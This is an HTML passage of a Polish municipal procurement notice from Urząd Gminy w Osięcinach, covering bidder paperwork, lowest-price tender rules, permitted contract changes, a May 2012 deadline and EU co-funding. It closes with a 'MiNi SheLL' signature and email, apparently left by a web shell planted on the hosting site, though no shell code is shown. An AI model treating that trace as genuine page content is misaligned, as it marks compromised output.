<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Druk oferty; dowód wniesienia wadium. Pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono                             z odrębnych przepisów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmian postanowień umowy   w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli wystąpią następujące okoliczności:                                                                                          
a)  wystąpiła konieczność wprowadzenia zmian w dokumentacji projektowej, sposobie lub  technologii wykonania przedmiotu umowy,                                                                                                     b)  zmiana podatku od towarów i usług VAT,                                                                                                         c)  konieczność zmiany terminu wykonania zamówienia na skutek:                                                                                            
- wystąpienia warunków atmosferycznych niepozwalających na wykonanie przedmiotu umowy ze względów technologicznych, co może mieć wpływ na jakość wykonania,  trwałość i zachowanie okresu gwarancji,                                                                                                  -  przedłużającego się oczekiwania na uzgodnienia, decyzje administracyjne, itp.                                                                          
-  zawieszenia robót przez zamawiającego                                                                                            -  działania siły wyższej,                                                                                                    d)  zmiana  warunków finansowania zamówienia,                                                                                                e)  zmiana na stanowisku kierownika budowy lub kierownika robót,                                                                                             
 f)   zmiana na stanowisku inspektora nadzoru,                                                                                                     g) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy,   na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu,                                          
    h) przy zawieraniu umowy nie można było przewidzieć rozmiaru lub kosztów prac.
2. Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego przez inspektora nadzoru                                       i przedstawiciela wykonawcy, zatwierdzonego przez kierownika Zamawiającego. 
Zmiana  umowy wymaga, pod rygorem nieważności zachowania formy pisemnej.
3 Zmiana osób na stanowisku kierownika budowy lub kierownika robót,  w trakcie realizacji przedmiotu umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w Specyfikacji Istotnych Warunków Zamówienia.
4. Zaakceptowana przez Zamawiającego zmiana osób  na stanowisku kierownika budowy lub kierownika robót, winna być potwierdzona pisemnie i nie wymaga aneksu do  umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-osieciny.samorzady.pl//<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Osięcinach, ul. I Armii Wojska Polskiego 14, 88-220 Osięciny, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2012 godzina 10:00, miejsce: Urząd Gminy w Osięcinach, ul. I Armii Wojska Polskiego 14 , sekretariat- pokój nr 19, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany w ramach działania 313,322, 323  Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com